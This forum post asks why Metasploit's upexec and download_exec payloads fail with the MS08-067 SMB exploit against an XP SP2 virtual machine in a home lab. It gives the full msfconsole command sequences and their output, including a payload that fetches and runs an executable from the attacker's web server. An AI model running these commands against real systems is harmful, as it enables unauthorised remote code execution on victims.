Jump to content

Metasploit Payload Upexec / Download_exec Not Working?


HiramKey

Recommended Posts

I never explored the upexec and download_exec payloads of the metasploit framework.

So the purpose of the test is to download / upload and execute an exe file as payload.

To make some tests I’m using two VM, one with BT4 RC2 and an XP Sp2 as victim.

The victim has the firewall disabled and no antivirus.

I’m trying to upload/download and execute the windows calculator (calc.exe)

I know that with a meterpeter session is possible with a simple upload and execute, but I’m experiencing some problems with both the following procedures:

1 ------------ WITH UPEXEC:

use exploit/windows/smb/ms08_067_netapi

set payload windows/upexec/reverse_tcp

set lhost 192.168.1.1

set rhost 192.168.1.2

set pexec /root/data/payloads/test/calc.exe

exploit

I got…

Started reverse handler on 192.168.1.1:4444

Automatically detecting the target...

Fingerprint: Windows XP - Service Pack 2

Selected Target: Windows XP SP2 (NX)

Attempting to trigger the vulnerability...

Sending stage (398 bytes) to 192.168.1.2

Sleeping before handling stage...

And it hang so without any result, the victim do not run the calc.exe

2 ------------ WITH DOWNLOAD_EXEC:

use exploit/windows/smb/ms08_067_netapi

set payload windows/download_exec

set lhost 192.168.1.1

set rhost 192.168.1.2

set url http://192.168.1.1/c.exe (httpd obviously active)

exploit

I got…

Automatically detecting the target...

Fingerprint: Windows XP - Service Pack 2

Selected Target: Windows XP SP2 (NX)

Attempting to trigger the vulnerability...

Exploit completed, but no session was created.

Even in that case the exe will not be executed on the victim…

So I think I’m missing something:

1. Am I doing something wrong with the procedure?

2. Does a win32 exe need to be pre encoded in a different format to be injected?

Does somebody here on the community able to use that payload and so kind to help me.

Namasté.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...